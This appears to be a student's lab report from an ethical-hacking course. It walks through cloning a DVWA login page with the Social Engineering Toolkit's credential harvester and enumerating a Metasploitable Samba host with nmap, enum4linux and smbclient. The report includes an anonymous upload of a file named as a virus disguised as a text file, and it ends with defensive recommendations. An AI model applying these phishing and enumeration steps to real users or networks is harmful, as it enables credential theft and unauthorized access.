Practical lab documentation covering website cloning with the Social Engineering Toolkit (SET) and SMB vulnerability scanning with Enum4Linux, completed as part of ParoCyber Ethical Hacking Training.
- Objectives
- Lab Environment
- Part 1: Website Cloning Lab
- Part 2: SMB Vulnerability Scanning
- Key Learnings
- References
- Author
The objectives of these labs are to:
- Understand website cloning as a social engineering attack vector
- Learn how credential harvesting works in phishing attacks
- Explore SMB vulnerabilities common in Windows networks
- Master Enum4Linux for SMB enumeration and vulnerability detection
- Recognize the importance of ethical boundaries in security testing
| Component | Details |
|---|---|
| Attacker Machine | Kali Linux |
| Target Network | 172.17.0.0/24 |
| Target Host (SMB) | 172.17.0.2 (metasploitable.vm) |
| Target Host (Website Cloning) | 10.6.6.1 (Attacker) → http://dvwa.vm (Cloned) |
| Samba Version | Samba 3.0.20-Debian |
| Tools Used | Social Engineering Toolkit (SET) v8.0.3, Enum4Linux v0.9.1, Nmap 7.94, SMBClient |
| Protocols | HTTP, SMB (445, 139) |
Website cloning is a technique used in social engineering attacks where an attacker creates an exact replica of a legitimate website. The goal is to trick users into entering sensitive information (credentials, credit card numbers, etc.) on the fake site.
Attack Flow:
Victim → Phishing Link → Cloned Website → Credentials Captured → Attacker
The Social Engineering Toolkit (SET) is an open-source penetration testing framework designed for social engineering attacks.
Version Used: 8.0.3 (Codename: 'Maverick')
SET includes modules for:
- Credential harvesting
- Website cloning
- Phishing attacks
- Payload delivery
sudo setoolkitOutput:
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
Version: 8.0.3
Codename: 'Maverick'
[---] Follow us on Twitter: @TrustedSec [---]
[---] Follow me on Twitter: @HackingDave [---]
[---] Homepage: https://www.trustedsec.com [---]
Screenshot:
From the main menu, select:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors <-- SELECT THIS
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
...
set> 2
Screenshot:
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method <-- SELECT THIS
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) HTA Attack Method
set:webattack> 3
Screenshot:
1) Web Templates
2) Site Cloner <-- SELECT THIS
3) Custom Import
set:webattack> 2
Screenshot:
Enter your Kali machine's IP address (this is where the cloned site will be hosted):
set:webattack> IP address for the POST back in Harvester/Tabnabbing [10.0.2.15]: 10.6.6.1
Screenshot:
Enter the URL of the website you want to clone. In this lab, we cloned DVWA (Damn Vulnerable Web Application):
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone: http://dvwa.vm
Screenshot:
SET will:
- Download the target website
- Modify forms to POST credentials to your server
- Start a web server on port 80
[*] Cloning the website: http://dvwa.vm
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
Screenshot:
When the victim visits the cloned site and enters credentials:
10.6.6.1 - - [18/Dec/2025 23:29:05] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: username=aliu
POSSIBLE PASSWORD FIELD FOUND: password=icorrectpassword!120-
POSSIBLE USERNAME FIELD FOUND: Login=Login
POSSIBLE USERNAME FIELD FOUND: user_token=6391a9b968b49f960ec449e7f6000a1f
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
10.6.6.1 - - [18/Dec/2025 23:32:30] "POST /index.html HTTP/1.1" 302 -
Captured Data:
| Field | Value |
|---|---|
| Username | aliu |
| Password | icorrectpassword!120- |
| User Token | 6391a9b968b49f960ec449e7f6000a1f |
Screenshot:
┌─────────────────────────────────────────────────────────────┐
│ ATTACK FLOW │
├─────────────────────────────────────────────────────────────┤
│ │
│ 1. Attacker clones legitimate website │
│ ↓ │
│ 2. Attacker sends phishing link to victim │
│ ↓ │
│ 3. Victim clicks link → sees familiar login page │
│ ↓ │
│ 4. Victim enters credentials │
│ ↓ │
│ 5. Credentials sent to attacker's server │
│ ↓ │
│ 6. Victim redirected to real site (unaware of attack) │
│ │
└─────────────────────────────────────────────────────────────┘
- ✅ Authorized penetration testing engagements
- ✅ Security awareness training demonstrations
- ✅ Educational purposes in controlled lab environments
- ✅ Testing your own systems
NEVER use for:
- ❌ Unauthorized access to accounts
- ❌ Stealing real credentials
- ❌ Targeting individuals without consent
- ❌ Any malicious purposes
SMB (Server Message Block) is a network protocol used for:
- File sharing
- Printer sharing
- Inter-process communication
- Network browsing
Common SMB Ports:
| Port | Service |
|---|---|
| 139 | NetBIOS Session Service |
| 445 | SMB Direct (Microsoft-DS) |
Why SMB is a Target:
- Often misconfigured
- Legacy versions have known vulnerabilities (EternalBlue, MS17-010)
- Can leak sensitive information (usernames, shares, policies)
Enum4Linux is a Linux tool for enumerating information from Windows and Samba systems.
Version Used: v0.9.1
It can extract:
- User lists
- Share lists
- Group membership
- Password policies
- OS information
| Setting | Value |
|---|---|
| Target IP | 172.17.0.2 |
| Target Name | metasploitable.vm |
| Target OS | Metasploitable (Samba 3.0.20-Debian) |
| Ports | 139, 445 |
| Workgroup | WORKGROUP |
First, we identify live hosts on the network:
sudo nmap -sN 172.17.0.0/24Output:
Starting Nmap 7.94 ( https://nmap.org ) at 2025-12-19 18:41 UTC
Nmap scan report for metasploitable.vm (172.17.0.2)
Host is up (0.000020s latency).
Not shown: 982 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open|filtered ftp
22/tcp open|filtered ssh
23/tcp open|filtered telnet
25/tcp open|filtered smtp
80/tcp open|filtered http
111/tcp open|filtered rpcbind
139/tcp open|filtered netbios-ssn
445/tcp open|filtered microsoft-ds
512/tcp open|filtered exec
513/tcp open|filtered login
514/tcp open|filtered shell
1099/tcp open|filtered rmiregistry
1524/tcp open|filtered ingreslock
2121/tcp open|filtered ccproxy-ftp
3306/tcp open|filtered mysql
5432/tcp open|filtered postgresql
6667/tcp open|filtered irc
8180/tcp open|filtered unknown
MAC Address: 02:42:AC:11:00:02 (Unknown)
Nmap done: 256 IP addresses (2 hosts up) scanned in 5.36 seconds
Screenshot:
enum4linux -a 172.17.0.2Explanation:
-a— Runs all simple enumeration options (-U -S -G -P -r -o -n -i)
Target Information Retrieved:
Target ........... 172.17.0.2
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
[+] Got domain/workgroup name: WORKGROUP
[+] Server 172.17.0.2 allows sessions using username '', password ''
OS Information:
METASPLOITABLE Wk Sv PrQ Unx NT SNT metasploitable server (Samba 3.0.20-Debian)
platform_id : 500
os version : 4.9
server type : 0x9a03
Screenshot:
enum4linux -U 172.17.0.2Users Discovered (35 accounts):
| Account | RID | Description |
|---|---|---|
| root | 0x3e8 | Root user |
| msfadmin | 0xbb8 | Metasploitable admin |
| user | 0xbba | Just a user |
| postgres | 0x4c0 | PostgreSQL administrator |
| mysql | 0x4c2 | MySQL Server |
| www-data | 0x42a | Web server user |
| ftp | 0x4be | FTP service |
| sshd | 0x4b8 | SSH daemon |
| tomcat55 | 0x4c4 | Tomcat server |
| service | 0xbbc | Service account |
Full User List:
user:[games] rid:[0x3f2]
user:[nobody] rid:[0x1f5]
user:[bind] rid:[0x4ba]
user:[proxy] rid:[0x402]
user:[syslog] rid:[0x4b4]
user:[user] rid:[0xbba]
user:[www-data] rid:[0x42a]
user:[root] rid:[0x3e8]
user:[news] rid:[0x3fa]
user:[postgres] rid:[0x4c0]
user:[bin] rid:[0x3ec]
user:[mail] rid:[0x3f8]
user:[distccd] rid:[0x4c6]
user:[proftpd] rid:[0x4ca]
user:[dhcp] rid:[0x4b2]
user:[daemon] rid:[0x3ea]
user:[sshd] rid:[0x4b8]
user:[man] rid:[0x3f4]
user:[lp] rid:[0x3f6]
user:[mysql] rid:[0x4c2]
user:[gnats] rid:[0x43a]
user:[libuuid] rid:[0x4b0]
user:[backup] rid:[0x42c]
user:[msfadmin] rid:[0xbb8]
user:[telnetd] rid:[0x4c8]
user:[sys] rid:[0x3ee]
user:[klog] rid:[0x4b6]
user:[postfix] rid:[0x4bc]
user:[service] rid:[0xbbc]
user:[list] rid:[0x434]
user:[irc] rid:[0x436]
user:[ftp] rid:[0x4be]
user:[tomcat55] rid:[0x4c4]
user:[sync] rid:[0x3f0]
user:[uucp] rid:[0x3fc]
Screenshot:
enum4linux -S 172.17.0.2Shares Discovered:
| Sharename | Type | Comment | Access |
|---|---|---|---|
| print$ | Disk | Printer Drivers | DENIED |
| tmp | Disk | oh noes! | OK |
| opt | Disk | DENIED | |
| IPC$ | IPC | IPC Service | N/A |
| ADMIN$ | IPC | IPC Service | DENIED |
Critical Finding: The tmp share is accessible anonymously!
//172.17.0.2/tmp Mapping: OK Listing: OK Writing: N/A
Screenshot:
enum4linux -P 172.17.0.2Password Policy Retrieved:
[+] Found domain(s):
[+] METASPLOITABLE
[+] Builtin
[+] Password Info for Domain: METASPLOITABLE
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
Password Complexity: Disabled
Minimum Password Length: 0
Screenshot:
smbclient -L //172.17.0.2/Output:
Password for [WORKGROUP\root]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
Screenshot:
smbclient //172.17.0.2/tmpOutput:
Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Dec 19 18:45:32 2025
.. DR 0 Mon Aug 14 10:39:59 2023
.X11-unix DH 0 Mon Aug 14 10:35:14 2023
groupwork.txt A 108 Fri Dec 19 18:21:06 2025
gconfd-msfadmin DR 0 Thu Dec 11 11:25:33 2025
orbit-msfadmin DR 0 Thu Dec 11 11:25:33 2025
...
38497656 blocks of size 1024. 8790560 blocks available
smb: \> put virus-2.exe groupwork-2.txt
putting file virus-2.exe as \groupwork-2.txt (5.1 kb/s) (average 5.1 kb/s)Critical Finding: The share allows anonymous file uploads!
Screenshot:
| Finding | Severity | Description |
|---|---|---|
| Null Session Allowed | 🔴 HIGH | Anonymous enumeration of users, shares, and policies |
| Anonymous Share Access | 🔴 HIGH | tmp share accessible without authentication |
| Writable Share | 🔴 CRITICAL | Anonymous users can upload files to tmp |
| No Password Complexity | 🟠 MEDIUM | Weak passwords allowed |
| No Account Lockout | 🟠 MEDIUM | Brute force attacks possible |
| 35 User Accounts Exposed | 🟠 MEDIUM | Full user list leaked |
| Outdated Samba Version | 🔴 HIGH | Samba 3.0.20 has known vulnerabilities |
| Issue | Recommendation |
|---|---|
| Null Sessions | Disable anonymous access via SMB configuration |
| Writable Shares | Remove write permissions for anonymous users |
| Password Policy | Enforce complexity and minimum length of 12+ characters |
| Account Lockout | Enable lockout after 5 failed attempts |
| Samba Version | Upgrade to latest supported version |
| User Enumeration | Restrict RID cycling and anonymous SID lookups |
- Social engineering exploits human trust, not technical vulnerabilities
- SET makes cloning trivially easy — a functional phishing site in under 5 minutes
- Credential harvesting captures everything — usernames, passwords, tokens
- User awareness training is critical for defense
- URL inspection is the best defense against cloned sites
- Null sessions are devastating — we extracted 35 usernames without any credentials
- Anonymous shares are dangerous — the
tmpshare allowed file uploads - Outdated Samba (3.0.20) has known exploits (including potential RCE)
- Password policy was weak — no complexity, no lockout threshold
- Enumeration alone is powerful — no exploitation needed to gather critical intel
From this lab, an attacker could:
- Use harvested usernames for password spraying attacks
- Upload malicious files to the writable
tmpshare - Exploit Samba 3.0.20 vulnerabilities (CVE-2007-2447)
- Combine phishing with SMB access for lateral movement
| Attack Vector | Defense |
|---|---|
| Website Cloning | User training, email filtering, URL inspection, MFA |
| Null Sessions | Disable anonymous access in SMB configuration |
| Writable Shares | Remove write permissions, audit share access |
| User Enumeration | Restrict anonymous SID/name translation |
| Weak Passwords | Enforce complexity, minimum 12 characters |
| No Lockout | Enable account lockout after 5 failed attempts |
| Outdated Software | Upgrade Samba to latest version |
- Social Engineering Toolkit Documentation
- Enum4Linux GitHub
- OWASP Phishing Guide
- Microsoft SMB Security Best Practices
- NIST Cybersecurity Framework
Aliu Tijani
Ethical Hacking Student | ParoCyber Training Program
This project is licensed under the MIT License - see the LICENSE file for details.
Created as part of ParoCyber Ethical Hacking Training — December 2025



















